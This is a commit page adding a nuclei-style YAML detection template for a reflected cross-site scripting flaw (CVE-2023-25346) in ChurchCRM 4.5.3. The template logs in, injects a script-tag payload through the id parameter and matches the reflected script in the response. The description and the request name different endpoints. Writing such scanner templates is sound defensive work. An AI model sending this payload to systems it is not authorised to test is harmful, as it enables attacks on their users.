Merge pull request #7530 from harsh2403/patch-2

Create CVE-2023-25346.yaml
patch-1
Dhiyaneshwaran 2023-06-28 09:52:45 +05:30 committed by GitHub
commit 0a619b42d6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 42 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: CVE-2023-25346
info:
name: ChurchCRM 4.5.3 - Cross-Site Scripting
author: Harsh
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.
reference:
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346
- https://nvd.nist.gov/vuln/detail/CVE-2023-25346
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-25346
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,churchcrm,xss,authenticated
http:
- raw:
- |
POST /session/begin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User={{username}}&Password={{password}}
- |
GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "ChurchCRM")'
condition: and